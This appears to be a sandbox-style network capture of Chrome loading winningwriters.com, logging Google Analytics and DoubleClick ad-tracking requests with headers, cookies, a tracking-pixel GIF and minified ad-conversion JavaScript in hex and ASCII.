                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:34 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            141192.168.2.1649879216.239.34.1814436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:36 UTC1410OUTPOST /g/collect?v=2&tid=G-S2XE0RVPX9&gtm=45je4be0v889608727z8846709124za200zb846709124&_p=1731960005145&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067554~102067808~102077855~102081484&cid=723902191.1731960008&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=4&sid=1731960008&sct=1&seg=1&dl=https%3A%2F%2Fwinningwriters.com%2F&dt=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&en=slider_change&ep.event_category=Slider&ep.event_label=Ad-Top&ep.value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&_et=8010&tfd=36217 HTTP/1.1
                                                                                                                                                                                            Host: analytics.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:36 UTC849INHTTP/1.1 204 No Content
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:36 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            142192.168.2.1649881142.250.185.1304436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:40 UTC1542OUTGET /td/rul/1072733940?random=1731960038420&cv=11&fst=1731960038420&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1
                                                                                                                                                                                            Host: td.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:40 UTC646INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:40 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:40 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: d<html></html>
                                                                                                                                                                                            2024-11-18 20:00:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            143192.168.2.1649880142.250.186.1624436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:40 UTC1418OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960038420&cv=11&fst=1731960038420&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:41 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:40 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:41 UTC675INData Raw: 31 33 30 65 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 130e(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:41 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
                                                                                                                                                                                            2024-11-18 20:00:41 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:41 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:41 UTC77INData Raw: 69 42 61 6b 44 35 54 75 30 6f 78 39 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 33 34 39 33 39 38 32 30 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: iBakD5Tu0ox9\x26random\x3d34939820\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            144192.168.2.1649884142.250.185.1644436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:42 UTC1484OUTGET /pagead/1p-user-list/1072733940/?random=1731960038420&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d7O67Cfg3AuzL-pZeDczgnCHbGjRKxwL7-o-biBakD5Tu0ox9&random=34939820&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:42 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:42 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:42 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            145192.168.2.1649883142.250.185.1944436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:42 UTC1240OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960038420&cv=11&fst=1731960038420&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:42 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:42 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:42 UTC675INData Raw: 31 33 31 30 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 1310(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:42 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
